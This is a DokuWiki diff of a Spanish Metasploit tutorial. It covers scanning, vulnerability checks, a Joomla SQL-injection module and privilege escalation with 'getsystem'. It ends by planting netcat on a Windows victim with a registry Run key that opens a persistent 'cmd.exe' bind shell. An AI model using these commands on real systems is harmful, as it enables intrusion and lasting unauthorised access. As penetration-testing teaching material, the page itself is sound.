meta data de esta página
  •  

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
aplicaciones:metasploit [2019/03/15 09:57] lcaplicaciones:metasploit [2023/01/18 14:10] (actual) – editor externo 127.0.0.1
Línea 4: Línea 4:
  
 Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework.  Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework. 
 +
 +<note>Si queremos utilizar el entorno gráfico de Metasploit, debemos ejecutar Armitage </note>
  
 En especial debemos arrancar las bases de de datos (msdb y postgresql) En especial debemos arrancar las bases de de datos (msdb y postgresql)
Línea 46: Línea 48:
  
  
 +===== Recopilar información =====
 +Metasploit tiene varios escaneres integrados, podemos ver los que tiene integrados ejecutando 
 +<sxh>seach portscan</sxh>
 +Por ejemplo podemos usar nmap para escanear un equipo 
 +<sxh>nmap -ss -Pn xxx.xxx.xxx.xxx</sxh> 
 +
 +también podemos usar **db_nmap** en especial si queremos manipular los resultados que nos muestre el nmap. 
 +<sxh>db_nmap -sS -Pn xxx.xxx.xxx.xxx</sxh> 
 +
 +=== Buscar máquinas vulnerables ===
 +Podemos usar metasploit para hacer un escaneo de máquinas vulnerables . Para ello ponemos la opción **--script vuln**  a nuestro db_nmap
 +<sxh>db_nmap -sS -Pn --script vuln xxx.xxx.xxx.xxx</sxh>
 +
 +También podemos hacer uso de otros escaner específicos, con el comando use y el escaner a utilizar
 +Por ejemplo <sxh>use auxiliary/gather/joomla_weblinks_sqli </sxh>
 +
 +<note> con options vemos que parámetros hay que establecer y cuales tiene configurado por defecto cada módulo</note>
 +
 +==== Escalada de privilegios ====
 +Necesitamos cargar el módulo priv <sxh>use priv</sxh>
 +para hacernos con privilegios del sistema <sxh>getsystem </sxh>
 +
 +==== Persistencia ====
 +Una vez obtenido el control, tenemos que realizar acciones que nos permitan mantener dicho control en el tiempo.
  
 +Un ejemplo para mantener el control en una máquina windows sería:
 +  - a la máquina víctima le subimos una copia del netcat <sxh>upload nc.exe c:\windows\system32</sxh>
 +  - le creamos una clave en el registro para que arranque netcat automáticamente  <sxh>reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp445 -e cmd.exe</sxh>